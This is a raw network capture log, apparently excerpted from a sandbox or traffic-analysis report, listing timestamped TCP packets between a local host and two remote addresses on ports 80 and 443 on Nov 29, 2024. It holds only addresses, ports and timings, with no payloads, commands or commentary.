                                                                                                                                                                                    Nov 29, 2024 19:49:37.346888065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.347827911 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.347971916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.348023891 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.348913908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.348961115 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.349062920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.350014925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.350121021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.350187063 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.351108074 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.351182938 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.351254940 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.352190971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.352252960 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.352289915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.353270054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.353396893 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.353477955 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.354362965 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.354455948 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.354516029 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.355454922 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.355519056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.355576038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.356540918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.356657028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.356719017 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.357628107 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.357697010 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.357783079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.358695984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.358797073 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.358858109 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.359767914 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.359859943 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.360902071 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.360955954 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.360961914 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.361924887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.362056017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.362077951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.363033056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.363092899 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.363128901 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.364106894 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.364240885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.364300966 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.365211964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.365339994 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.365362883 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.366326094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.366384983 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.366466999 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.367358923 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.367464066 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.367516994 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.368477106 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.368530989 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.368583918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.369539976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.369599104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.369648933 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.370636940 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.370717049 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.370778084 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.371723890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.371786118 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.371795893 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.372833014 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.372947931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.372992992 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.373893023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.374037981 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.374977112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.375025034 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.375109911 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.376097918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.376137972 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.376176119 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.377124071 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.377218962 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.377237082 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.378231049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.378344059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.379163027 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.379354954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.379411936 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.379461050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.380413055 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.380462885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.380467892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.406474113 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.406965971 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.406981945 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.407454014 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.407459974 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.424386024 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.700612068 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.715401888 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.741848946 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.752522945 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.768140078 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.852065086 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.852077007 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.852622986 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.852627993 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.853128910 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.853136063 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.854173899 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.854180098 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.861016035 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.861084938 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.862535954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.862591982 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.862607956 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.863095999 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.863141060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.863142014 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.863492012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.864171028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.864291906 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.864334106 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.865253925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.865375996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.865416050 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.866329908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.866712093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.866763115 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.867430925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.867525101 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.868520975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.868633986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.868678093 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.869570971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.869704008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.869748116 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.870698929 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.870778084 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.870820999 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.871870041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.871972084 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.872838974 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.872890949 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.873007059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.875504017 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:37.878789902 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.878801107 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.878873110 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.878879070 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.918755054 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.918796062 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:37.918947935 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.920126915 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:37.920140982 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.017004967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137063980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137190104 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137252092 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137620926 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137747049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.137839079 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.138705969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.138808966 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.138875008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.139867067 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.140002966 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.140049934 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.140901089 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.141053915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.141093969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.141995907 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.142149925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.142196894 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.143096924 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.143277884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.143376112 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.144205093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.144300938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.144351006 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.145289898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.145420074 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.145462990 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.146825075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.146962881 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.147111893 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.147849083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.147957087 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.148010969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.148768902 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.148854017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.148974895 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.150001049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.150132895 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.150183916 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.151151896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.151249886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.151324987 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.152151108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.152239084 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.152751923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.153063059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.153075933 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.153122902 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.154206991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.154330969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.154503107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.155179024 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.155282021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.155335903 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.156117916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.156246901 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.156286001 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.157177925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.157361031 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.157433987 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.158225060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.158344984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.158457994 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.159317970 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.159401894 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.159459114 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.160393953 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.160500050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.160552979 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.161472082 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.161537886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.161670923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.162565947 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.162677050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.162725925 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.163652897 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.163784027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.163836002 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.164918900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.165009022 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.165052891 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.165832996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.166140079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.166201115 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.166929960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.167059898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.167113066 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.167984009 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.168126106 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.168230057 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.169063091 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.169194937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.169388056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.170169115 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.170300961 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.170347929 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.171250105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.171437025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.171490908 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.172324896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.172437906 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.172482014 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.173448086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.173490047 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.173552990 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.174489975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.174617052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.174665928 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.175673008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.175802946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.175851107 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.176661968 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.176759958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.176872969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.177800894 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.177853107 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.177911043 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.177984953 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178086996 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178153992 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178262949 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178283930 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178296089 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178306103 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178569078 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178631067 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178818941 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178852081 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178925991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.178975105 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.179218054 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.179225922 CET4434976313.107.246.63192.168.2.6
